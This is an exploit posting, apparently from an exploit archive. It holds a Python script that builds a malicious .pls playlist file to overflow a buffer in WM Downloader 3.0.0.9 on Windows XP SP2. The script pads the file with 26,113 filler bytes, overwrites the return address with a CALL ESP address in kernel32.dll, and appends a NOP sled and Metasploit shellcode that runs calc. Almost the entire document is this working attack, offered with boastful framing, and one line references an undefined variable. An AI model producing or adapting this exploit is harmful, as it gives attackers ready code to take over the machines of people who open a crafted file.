|
#+----------------------------------------------------------------------+
# Exploit Title: WM Downloader 3.0.0.9 (.pls) Buffer Overflow Exploit
# Date: 08/04/2012
# Author: Tunisian spl01t3r
# Tested on: windows XP sp2
# Greetz: Milw0rm 1337day.com
#
# ____ (_) ____ ___
# ( _ \| |( _ \ / _ \
# | | | | || | | x |_|
# | ||_/|_|| ||_/ \___/
# |_| |_|
# _
# (_) ____ ____ ____ _____
# | | / __| / __| \__ \ / ` \
# | | \___ \ \___ \ / _ \_ | Y Y \
# |_| |____/ |____/ (___ / |_|_| /
# \/ \/
+----------------------------------------------------------------------+
#!/usr/bin/python
import sys,os
print "###############################################"
print "# WM Downloader 3.0.0.9 #"
print "# Tunisian_spl01t3r #"
print "# tn.spl01t3r@gmail.com #"
print "# fb.com/TN.spl0it3r #"
print "###############################################\r\n"
file=open('iss.pls','w')
buffer="\x41" * 26113
eip="\xF0\x69\x83\x7C" # 7C8369F0 CALL ESP kernel32.dll
nops="\x90" * 30
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode = (
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa4"
"\x0d\x2b\xba\x83\xeb\xfc\xe2\xf4\x58\xe5\x6f\xba\xa4\x0d\xa0\xff"
"\x98\x86\x57\xbf\xdc\x0c\xc4\x31\xeb\x15\xa0\xe5\x84\x0c\xc0\xf3"
"\x2f\x39\xa0\xbb\x4a\x3c\xeb\x23\x08\x89\xeb\xce\xa3\xcc\xe1\xb7"
"\xa5\xcf\xc0\x4e\x9f\x59\x0f\xbe\xd1\xe8\xa0\xe5\x80\x0c\xc0\xdc"
"\x2f\x01\x60\x31\xfb\x11\x2a\x51\x2f\x11\xa0\xbb\x4f\x84\x77\x9e"
"\xa0\xce\x1a\x7a\xc0\x86\x6b\x8a\x21\xcd\x53\xb6\x2f\x4d\x27\x31"
"\xd4\x11\x86\x31\xcc\x05\xc0\xb3\x2f\x8d\x9b\xba\xa4\x0d\xa0\xd2"
"\x98\x52\x1a\x4c\xc4\x5b\xa2\x42\x27\xcd\x50\xea\xcc\xfd\xa1\xbe"
"\xfb\x65\xb3\x44\x2e\x03\x7c\x45\x43\x6e\x4a\xd6\xc7\x0d\x2b\xba")
file.write(buffer+eip+nops+shellcode)
print "\n [+] 3vil File Created \n\n"
print "\n enj0y ;) \n\n"
print shell
raw_input("[+] Press any key to exit...")
file.close()
#+----------------------------------------------------------------------+
#[+] greetz to : BIbou sfaxien ; mech lazem ;tn_scorpion ; anas laaribi ;
# jendoubi ahmed ; s-man ; chaouki mkachakh & ;) --Geni ryodan-- ;)
#
# mAhna mAhna
#
#[+] profile : www.facebook.com/TN.spl0it3r
#
#+----------------------------------------------------------------------+
|
推荐
评论(0条)
